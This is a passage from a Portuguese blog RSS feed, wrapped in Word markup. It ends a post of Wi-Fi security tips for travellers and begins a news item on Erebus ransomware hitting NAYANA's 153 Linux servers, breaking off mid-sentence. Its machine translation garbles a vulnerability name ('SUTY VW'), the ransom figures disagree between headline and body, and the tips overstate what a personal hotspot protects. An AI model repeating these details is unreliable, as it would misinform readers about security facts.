uma boa opção.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Se você é viajante de
negócios e precisa necessitar do acesso à internet em qualquer lugar, sugere-se
transportar sua própria porta Ethernet e um dispositivo habilitado para
Ethernet.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Hotspot pessoal&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Embora
esta seja uma opção cara, mas é a melhor para os viajantes de negócios, que
precisam estar online sempre.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Um ponto de acesso privado / pessoal vem em planos pré-pagos
e pós-pagos.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;O hotspot pessoal protege sua
atividade online e criptografa todos os seus detalhes.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Todas as suas atividades on-line, incluindo as transações de
dinheiro, são garantidas.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Wi-Fi
Dicas para viajantes internacionais&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;Quando
você está viajando internacionalmente, você realmente precisa ficar conectado
com as pessoas em seu país de origem e a internet é a única saída.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt; &lt;span class=&quot;notranslate&quot;&gt;Assim, torna-se ainda mais
importante manter o cuidado e a vigilância sobre o uso das redes WiFi públicas
e tomar algumas etapas básicas para garantir-se em hotspots WiFi públicos para proteger
seus dados ao usar redes sem fio não seguras.&lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;Você
     precisa usar um software VPN, pois criptografará todos os dados que seu PC
     envia para que não seja hackeável.&lt;/span&gt; &lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;Monitore
     sua conexão Bluetooth em locais públicos para garantir que outros não
     interceptem sua transferência de dados.&lt;/span&gt; &lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;Usar
     as redes não criptografadas é altamente arriscado, pois todos os seus
     detalhes são facilmente hackeáveis.&lt;/span&gt; &lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;Manter
     o WiFi desligado quando não está em uso é outra dica muito importante.&lt;/span&gt;
     &lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;Além
     disso, é preciso evitar o download ou a instalação de atualizações nos
     dispositivos quando viaja internacionalmente.&lt;/span&gt; &lt;span class=&quot;notranslate&quot;&gt;Isso ocorre porque os hackers costumam enganar os
     usuários com tais notificações de atualização para entrar no seu sistema.&lt;/span&gt;
     &lt;/li&gt;
&lt;/ul&gt;
&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;; font-size: 12.0pt; mso-ansi-language: PT-BR; mso-bidi-language: AR-SA; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: PT-BR;&quot;&gt;É melhor se você pode usar uma conexão por cabo
ou comprar um plano de dados ilimitado para o seu dispositivo e parar de usar o
Wi-Fi público completamente&lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 12.0pt;&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span class=&quot;notranslate&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 18.0pt;&quot;&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2017/07/style-definitions-table.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAJVIuLhzBmEtS2H1rYmjGpaLguWToGzQbh8guuxKPgWAb9FIDp98IJCpFT_2rsHiSOwxXX21JlKjkqOo92ZlvuR_OkFEPIyHzVotfkpsobgVs6Vi-UtOpyZH-TJ9UkiNxGs-vRIhs3IY/s72-c/Wi-Fi-security-when-Traveling.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-5886852177643480932</guid><pubDate>Sat, 15 Jul 2017 00:29:00 +0000</pubDate><atom:updated>2017-07-14T21:30:22.234-03:00</atom:updated><title></title><description>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 24.0pt; line-height: 107%;&quot;&gt;Ransomware sequestra 153 servidores Linux e empresa
teve que pagar R$ 3 milhões para descriptografar. &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-size: 24.0pt; line-height: 107%;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXnWt3OJbEuzhyqBLvn9rNiLL8WhpxFzkmhc6FqS9Zx10FgCZzjg83LoF8FusvtK4iVvUwN-0vq6n36byLewLQEQhkZFhbY7yRHJRh615aGwMtpWOSHFWl_88-EHQevPu5-U_ZY4CcqA/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;307&quot; data-original-width=&quot;566&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXnWt3OJbEuzhyqBLvn9rNiLL8WhpxFzkmhc6FqS9Zx10FgCZzjg83LoF8FusvtK4iVvUwN-0vq6n36byLewLQEQhkZFhbY7yRHJRh615aGwMtpWOSHFWl_88-EHQevPu5-U_ZY4CcqA/s1600/1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Ransomware
sequestra 153 servidos Linux e empresa teve que pagar R$ 3 milhões de resgate.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;O
provedor de hospedagem&amp;nbsp; web sul-coreano concordou em pagar US$ 1 milhão em
bitcoins para crackers depois que um ransomware Linux infectou seus 153
servidores, criptograficando 3.400 sites de negócios e seus dados hospedados
neles.&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&lt;br /&gt;&lt;br /&gt;

De acordo com uma publicação no blog publicada pela NAYANA, a empresa de hospedagem
na web, este evento infeliz aconteceu no dia 10 de junho, quando o malware do
Ransomware atingiu seus servidores de hospedagem e o atacante exigiu 550
bitcoins (mais de US$ 1,6 milhão) para desbloquear os arquivos criptografados.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;No
entanto, a empresa negociou mais tarde com os cibercriminosos e concordou em
pagar 397,6 bitcoins (cerca de US$ 1,01 milhão) em três parcelas para que seus
arquivos fossem descriptografados.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;A
empresa de hospedagem já pagou duas parcelas no momento da redação e pagaria a
última parcela do resgate depois de recuperar dados de dois terços dos
servidores infectados.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;De
acordo com a empresa de segurança Trend Micro, o Ransomware usado no ataque foi
o Erebus que foi detectado em setembro do ano passado e foi visto em fevereiro
deste ano com as capacidades de desvio de controle de conta de usuário do
Windows.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;Uma
vez que os servidores de hospedagem estavam sendo executados no kernel do Linux
2.6.24.2, os pesquisadores acreditam que o Ransomware do Erebus Linux pode ter
usado vulnerabilidades conhecidas, como SUTY VW; Ou uma aplicação local do
Linux para assumir o acesso raiz do sistema.&lt;/span&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
  &lt;o:TargetScreenSize&gt;1024x768&lt;/o:TargetScreenSize&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
  &lt;/w:Compatibility&gt;
 &lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabela normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin:0cm;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:&quot;Times New Roman&quot;;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-family: &amp;quot;calibri&amp;quot;; font-size: 11.0pt; line-height: 107%;&quot;&gt;&quot;A
versão do Apache NAYANA usada é executada como um usuário de ninguém (uid =
99), o que indica que uma exploração local também pode ter sido usada no
